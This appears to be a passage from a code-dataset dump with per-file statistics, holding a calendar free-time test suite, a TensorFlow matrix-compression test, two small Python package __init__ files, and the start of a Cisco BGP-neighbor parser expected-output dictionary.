entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase5():
# test case to check two-event system where the second entry is engulfed in the first entry
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T12:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase6():
# test case to check two-event system where first event end is equal to second event start
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase7():
# test case to check two-event system where two events have the same start and end
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase8():
# test case to check two-event system where the first event start is before the second event start and both events have the same end
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T12:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase9():
# complete disaster test #1: many overlapping events within a single day
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T11:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry3 = {'start':arrow.get('2015-12-10T09:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entry4 = {'start':arrow.get('2015-12-10T15:00:00-08:00'), 'end':arrow.get('2015-12-10T16:00:00-08:00')}
entry5 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entryList = [entry1,entry2,entry3,entry4,entry5]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T09:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase10():
# complete disaster test #2: overlapping events spread over several days
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T11:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry3 = {'start':arrow.get('2015-12-11T09:00:00-08:00'), 'end':arrow.get('2015-12-11T11:00:00-08:00')}
entry4 = {'start':arrow.get('2015-12-11T15:00:00-08:00'), 'end':arrow.get('2015-12-11T16:00:00-08:00')}
entry5 = {'start':arrow.get('2015-12-13T14:00:00-08:00'), 'end':arrow.get('2015-12-13T18:00:00-08:00')}
entry6 = {'start':arrow.get('2015-12-13T09:00:00-08:00'), 'end':arrow.get('2015-12-13T12:00:00-08:00')}  # unused: the expected free times below assume only the five events in entryList
entryList = [entry1,entry2,entry3,entry4,entry5]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-13T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T14:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>], ",
"[<Arrow [2015-12-11T07:00:00-08:00]>, <Arrow [2015-12-11T09:00:00-08:00]>], ",
"[<Arrow [2015-12-11T11:00:00-08:00]>, <Arrow [2015-12-11T15:00:00-08:00]>], ",
"[<Arrow [2015-12-11T16:00:00-08:00]>, <Arrow [2015-12-11T21:00:00-08:00]>], ",
"[<Arrow [2015-12-12T07:00:00-08:00]>, <Arrow [2015-12-12T21:00:00-08:00]>], ",
"[<Arrow [2015-12-13T07:00:00-08:00]>, <Arrow [2015-12-13T14:00:00-08:00]>], ",
"[<Arrow [2015-12-13T18:00:00-08:00]>, <Arrow [2015-12-13T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
| 47.832558 | 131 | 0.659374 | 1,633 | 10,284 | 4.15248 | 0.074709 | 0.111488 | 0.111488 | 0.148651 | 0.905914 | 0.90031 | 0.90031 | 0.856363 | 0.846335 | 0.806813 | 0 | 0.25974 | 0.123979 | 10,284 | 214 | 132 | 48.056075 | 0.492951 | 0.105018 | 0 | 0.72028 | 0 | 0.188811 | 0.450256 | 0.369729 | 0 | 0 | 0 | 0 | 0.06993 | 1 | 0.06993 | false | 0 | 0.027972 | 0 | 0.097902 | 0.111888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fca08b2994b172ed6223a62746289e773e1e3c77 | 11,680 | py | Python | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 7 | 2021-06-15T05:54:29.000Z | 2022-02-21T06:57:06.000Z | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 12 | 2021-08-25T16:15:31.000Z | 2022-02-10T05:10:37.000Z | graph_compression/compression_lib/dl_compression_op_test.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 5 | 2021-11-25T07:40:17.000Z | 2022-03-22T11:13:39.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for dl_compression_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from graph_compression.compression_lib import compression_op
from graph_compression.compression_lib import dl_compression_op
class DlCompressionOpTest(tf.test.TestCase):
def test_DLDecompMatrixCompressor_interface(self):
compressor = dl_compression_op.DLMatrixCompressor(
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams())
B = np.random.normal(0, 1, [20, 10]) # pylint: disable = invalid-name
sub_thresh_indices = (B <= 0.5)
B[sub_thresh_indices] = 0
B[:, 0] = np.ones(shape=B[:, 0].shape)
C = np.random.normal(0, 1, [10, 5]) # pylint: disable = invalid-name
A = np.matmul(B, C) # pylint: disable = invalid-name
[B_out, C_out] = compressor.static_matrix_compressor(A, n_iterations=32) # pylint: disable = invalid-name
A_recovered = np.matmul(B_out, C_out) # pylint: disable = invalid-name
print("np.linalg.norm(A-A_recovered) / np.linalg.norm(A): ",
np.linalg.norm(A - A_recovered) / np.linalg.norm(A))
print("A: ", A)
print("A_recovered: ", A_recovered)
print("fraction error np.linalg.norm(A-A_recovered): ",
np.linalg.norm(A - A_recovered) / np.linalg.norm(A))
self.assertLessEqual(
np.linalg.norm(A - A_recovered) / np.linalg.norm(A), 0.1)
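The assertion above bounds the relative Frobenius reconstruction error of the recovered factors. A minimal NumPy sketch of the same kind of check, substituting a plain truncated SVD for the dictionary-learning compressor (an assumption made purely for illustration; `DLMatrixCompressor` itself is defined elsewhere in `dl_compression_op`):

```python
import numpy as np

rng = np.random.default_rng(0)
B = rng.normal(0, 1, (20, 10))  # code matrix
C = rng.normal(0, 1, (10, 5))   # dictionary
A = B @ C                       # 20x5 product, so rank(A) <= 5

# A rank-5 truncated SVD recovers A essentially exactly.
U, s, Vt = np.linalg.svd(A, full_matrices=False)
k = 5
A_rec = (U[:, :k] * s[:k]) @ Vt[:k]

rel_err = np.linalg.norm(A - A_rec) / np.linalg.norm(A)
assert rel_err < 0.1  # same tolerance the test above uses
```

The real compressor additionally keeps the recovered `B` sparse, which an SVD does not; the sketch only illustrates how the relative-error criterion is computed.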
def test_dl_compression_op_interface(self):
with self.cached_session() as session:
self.check_dl_compression_op_interface(session)
def test_dl_compression_op_interface_supervisor(self):
with tf.Session() as session:
session.graph._unsafe_unfinalize()
self.check_dl_compression_op_interface_sparse(session, use_dl_op=True)
def check_dl_compression_op_interface(self, session, use_dl_op=False):
compression_hparams = ("name=cifar10_compression," +
"begin_compression_step=1000," +
"end_compression_step=120000," +
"compression_frequency=100," +
"compression_option=3," + "rank=200," +
"update_option=1")
update_style = 1
global_step = tf.get_variable("global_step", initializer=30)
compression_op_spec = compression_op.CompressionOp.get_default_hparams(
).parse(compression_hparams)
compression_op_spec.set_hparam("use_tpu", False)
if use_dl_op:
CompOp = dl_compression_op.DLCompressionOp # pylint: disable = invalid-name
else:
CompOp = compression_op.CompressionOp # pylint: disable = invalid-name
c = CompOp(spec=compression_op_spec, global_step=global_step)
# Need to add initial value for A so that we would know what to expect back.
code = np.random.normal(0, 1, [20, 10])
dictionary = np.random.normal(0, 1, [10, 5])
A_init = np.matmul(code, dictionary) # pylint: disable = invalid-name
A = tf.get_variable( # pylint: disable = invalid-name
"A",
initializer=A_init.astype(np.float32),
dtype=tf.float32)
MC = dl_compression_op.DLMatrixCompressor( # pylint: disable = invalid-name
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams()
.parse("num_rows=3,num_cols=3,rank=200,is_b_matrix_trainable=False"))
[_, A_update_op] = c.get_apply_compression_op( # pylint: disable = invalid-name
A, MC, scope="my_scope")
tf.global_variables_initializer().run()
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.a_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001), True)
tf.assign(global_step, 1001).eval()
print("global_step.eval is ", global_step.eval())
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.b_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
[B, C] = MC.static_matrix_compressor( # pylint: disable = invalid-name
c.a_matrix_tfvar.eval())
print("norm of error is ", np.linalg.norm(B - c.b_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(B - c.b_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(np.abs(C - c.c_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.b_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
tf.assign(global_step, 1001).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
np.linalg.norm(c.b_matrix_tfvar.eval()),
np.linalg.norm(c.c_matrix_tfvar.eval()))
tf.assign(global_step, 2000).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
self.assertAlmostEqual(c.alpha.eval(), 0.97)
self.assertEqual(c._last_alpha_update_step.eval(), 2000)
def check_dl_compression_op_interface_sparse(self, session, use_dl_op=False):
compression_hparams = ("name=cifar10_compression," +
"begin_compression_step=1000," +
"end_compression_step=120000," +
"compression_frequency=100," +
"compression_option=3," + "rank=200," +
"update_option=1")
update_style = 1
global_step = tf.get_variable("global_step", initializer=30)
compression_op_spec = compression_op.CompressionOp.get_default_hparams(
).parse(compression_hparams)
compression_op_spec.set_hparam("use_tpu", False)
if use_dl_op:
CompOp = dl_compression_op.DLCompressionOp # pylint: disable = invalid-name
else:
CompOp = compression_op.CompressionOp # pylint: disable = invalid-name
c = CompOp(spec=compression_op_spec, global_step=global_step)
code = np.random.normal(0, 1, [20, 10])
dictionary = np.random.normal(0, 1, [10, 5])
A_init = np.matmul(code, dictionary) # pylint: disable = invalid-name
A = tf.get_variable( # pylint: disable = invalid-name
"A", initializer=A_init.astype(np.float32), dtype=tf.float32)
MC = dl_compression_op.DLMatrixCompressor( # pylint: disable = invalid-name
spec=compression_op.LowRankDecompMatrixCompressor.get_default_hparams(
).parse("num_rows=3,num_cols=3,rank=200,is_b_matrix_trainable=False"))
[_, A_update_op] = c.get_apply_compression_op( # pylint: disable = invalid-name
A, MC, scope="my_scope")
tf.global_variables_initializer().run()
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.a_matrix_tfvar.eval())) < 0.00001),
False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001), True)
tf.assign(global_step, 1001).eval()
print("global_step.eval is ", global_step.eval())
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAllEqual(
np.all(c.b_matrix_indices_tfvar.eval().size < 0.00001), False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
[B, C] = MC.static_matrix_compressor(c.a_matrix_tfvar.eval()) # pylint: disable = invalid-name
print("B, B_tfvar :", B, c.b_matrix_tfvar.eval())
print("norm of error is ",
np.linalg.norm(B - tf.sparse.to_dense(c.b_matrix_tfvar).eval()))
self.assertAllEqual(
np.all(
np.abs(B - tf.sparse.to_dense(c.b_matrix_tfvar).eval()) < 0.00001),
True)
self.assertAllEqual(
np.all(np.abs(C - c.c_matrix_tfvar.eval()) < 0.00001), True)
self.assertAllEqual(
np.all(c.b_matrix_indices_tfvar.eval().size < 0.00001), False)
self.assertAllEqual(
np.all(np.abs(np.linalg.norm(c.c_matrix_tfvar.eval())) < 0.00001),
False)
tf.assign(global_step, 1001).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
tf.assign(global_step, 2000).eval()
if update_style == 0:
A_update_op.eval()
else:
c.run_update_step(session)
print("global_step: ", c._global_step.eval())
print("alpha: ", c.alpha.eval())
print("last_alpha_update_step: ", c._last_alpha_update_step.eval())
print("A,B,C norms are : ", np.linalg.norm(c.a_matrix_tfvar.eval()),
c.b_matrix_indices_tfvar.eval().size,
np.linalg.norm(c.c_matrix_tfvar.eval()))
self.assertAlmostEqual(c.alpha.eval(), 0.97)
self.assertEqual(c._last_alpha_update_step.eval(), 2000)
if __name__ == "__main__":
tf.test.main()
| 40.696864 | 110 | 0.667038 | 1,664 | 11,680 | 4.426082 | 0.129808 | 0.051324 | 0.061914 | 0.047658 | 0.830414 | 0.809369 | 0.770401 | 0.756551 | 0.756551 | 0.756551 | 0 | 0.027314 | 0.194435 | 11,680 | 286 | 111 | 40.839161 | 0.755447 | 0.11036 | 0 | 0.754464 | 0 | 0 | 0.11197 | 0.059415 | 0 | 0 | 0 | 0 | 0.09375 | 1 | 0.022321 | false | 0 | 0.03125 | 0 | 0.058036 | 0.183036 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5d76dff458fcee8d391a62b343b113ba43a82f0a | 358 | py | Python | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | lstchain/irf/__init__.py | mdebony/cta-lstchain | 9030a53478459aeaa601367653be1d8854eee807 | [
"BSD-3-Clause"
] | null | null | null | from .hdu_table import (
create_hdu_index_hdu,
create_obs_index_hdu,
create_event_list,
get_timing_params,
get_pointing_params,
add_icrs_position_params
)
__all__ = [
"create_hdu_index_hdu",
"create_obs_index_hdu",
"create_event_list",
"get_timing_params",
"get_pointing_params",
"add_icrs_position_params"
]
| 19.888889 | 30 | 0.726257 | 47 | 358 | 4.787234 | 0.361702 | 0.142222 | 0.248889 | 0.151111 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0.906667 | 0 | 0 | 0.195531 | 358 | 17 | 31 | 21.058824 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.326816 | 0.067039 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5d82dcc252301e2e39cd147d97070960425a5538 | 156 | py | Python | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 205 | 2018-02-27T09:54:56.000Z | 2022-03-24T02:20:02.000Z | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 59 | 2018-02-07T07:56:59.000Z | 2022-02-03T14:05:23.000Z | csbdeep/utils/__init__.py | Takuya1031/CSBDeep | 75877938b329173fb33cc19b2d96a773ed000b62 | [
"BSD-3-Clause"
] | 81 | 2018-06-02T15:03:19.000Z | 2022-03-12T08:43:17.000Z | from __future__ import print_function, unicode_literals, absolute_import, division
from .plot_utils import *
from .utils import *
from .utils import _raise | 31.2 | 82 | 0.826923 | 21 | 156 | 5.714286 | 0.571429 | 0.275 | 0.25 | 0.333333 | 0.341667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121795 | 156 | 5 | 83 | 31.2 | 0.875912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
5d83e08f64768c2d4a4a79cad961f770ae492d0d | 27,991 | py | Python | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 4 | 2020-08-20T12:23:12.000Z | 2021-06-15T14:10:02.000Z | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 119 | 2020-07-10T22:37:51.000Z | 2021-03-18T02:40:05.000Z | src/genie/libs/parser/iosxe/tests/ShowBgpNeighbors/cli/equal/golden_output1_expected.py | jmedina0911/genieparser | 2fcd6d3e44891551af4b9d05e2c053218ee25c32 | [
"Apache-2.0"
] | 2 | 2020-07-10T15:33:42.000Z | 2021-04-05T09:48:56.000Z | expected_output = {
"list_of_neighbors": ["10.1.1.1", "10.2.2.2"],
"vrf": {
"default": {
"neighbor": {
"10.1.1.1": {
"address_family": {
"ipv4 unicast": {
"advertise_bit": 0,
"bgp_table_version": 1,
"dynamic_slow_peer_recovered": "never",
"index": 1,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {"total": 0},
"outbound": {"total": 0},
},
"max_nlri": 0,
"min_nlri": 0,
"neighbor_version": "1/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": 0,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_current": 0,
"prefixes_total": 0,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"update_group_member": 1,
},
"vpnv4 unicast": {
"advertise_bit": 1,
"bgp_table_version": 21,
"current_time": "0x13F885E6",
"dynamic_slow_peer_recovered": "never",
"extended_community_attribute_sent": True,
"index": 3,
"last_detected_dynamic_slow_peer": "never",
"last_received_refresh_end_of_rib": "never",
"last_received_refresh_start_of_rib": "never",
"last_sent_refresh_end_of_rib": "never",
"last_sent_refresh_start_of_rib": "never",
"local_policy_denied_prefixes_counters": {
"inbound": {
"af_permit_check": "n/a",
"bestpath_from_ibgp_peer": "n/a",
"bestpath_from_this_peer": "n/a",
"originator_loop": 8,
"total": 8,
},
"outbound": {
"af_permit_check": 4,
"bestpath_from_ibgp_peer": 4,
"bestpath_from_this_peer": 4,
"originator_loop": "n/a",
"total": 12,
},
},
"max_nlri": 1,
"min_nlri": 0,
"neighbor_version": "21/0",
"output_queue_size": 0,
"prefix_activity_counters": {
"received": {
"explicit_withdraw": 0,
"implicit_withdraw": 0,
"prefixes_total": 4,
"used_as_bestpath": 4,
"used_as_multipath": 0,
"used_as_secondary": 0,
},
"sent": {
"explicit_withdraw": 0,
"implicit_withdraw": 4,
"prefixes_total": 8,
"used_as_bestpath": "n/a",
"used_as_multipath": "n/a",
"used_as_secondary": "n/a",
},
},
"refresh_activity_counters": {
"received": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
"sent": {
"refresh_end_of_rib": 0,
"refresh_start_of_rib": 0,
},
},
"refresh_epoch": 1,
"slow_peer_detection": False,
"slow_peer_split_update_group_dynamic": False,
"update_group_member": 3,
},
},
"bgp_event_timer": {
"next": {
"ackhold": "0x0",
"deadwait": "0x0",
"giveup": "0x0",
"keepalive": "0x0",
"linger": "0x0",
"pmtuager": "0x0",
"processq": "0x0",
"retrans": "0x0",
"sendwnd": "0x0",
"timewait": "0x0",
},
"starts": {
"ackhold": 6150,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 6150,
"sendwnd": 0,
"timewait": 0,
},
"wakeups": {
"ackhold": 6008,
"deadwait": 0,
"giveup": 0,
"keepalive": 0,
"linger": 0,
"pmtuager": 0,
"processq": 0,
"retrans": 0,
"sendwnd": 0,
"timewait": 0,
},
},
"bgp_neighbor_session": {"sessions": 1},
"bgp_negotiated_capabilities": {
"enhanced_refresh": "advertised and received",
"four_octets_asn": "advertised and received",
"ipv4_unicast": "advertised and received",
"route_refresh": "advertised and received(new)",
"stateful_switchover": "NO for session 1",
"vpnv4_unicast": "advertised and received",
},
"bgp_negotiated_keepalive_timers": {
"hold_time": 180,
"keepalive_interval": 60,
},
"bgp_neighbor_counters": {
"messages": {
"in_queue_depth": 0,
"out_queue_depth": 0,
"received": {
"keepalives": 6147,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6162,
"updates": 14,
},
"sent": {
"keepalives": 6146,
"notifications": 0,
"opens": 1,
"route_refresh": 0,
"total": 6157,
"updates": 10,
},
}
},
"bgp_session_transport": {
"ack_hold": 200,
"address_tracking_status": "enabled",
"connection": {
"dropped": 0,
"established": 1,
"last_reset": "never",
},
"connection_state": "estab",
"connection_tableid": 0,
"datagram": {
"datagram_received": {
"out_of_order": 0,
"total_data": 118194,
"value": 12281,
"with_data": 6151,
},
"datagram_sent": {
"fastretransmit": 0,
"partialack": 0,
"retransmit": 0,
"second_congestion": 0,
"total_data": 117635,
"value": 12246,
"with_data": 6151,
},
},
"delrcvwnd": 19,
"ecn_connection": "disabled",
"enqueued_packets": {
"input_packet": 0,
"mis_ordered_packet": 0,
"retransmit_packet": 0,
},
"fast_lock_acquisition_failures": 0,
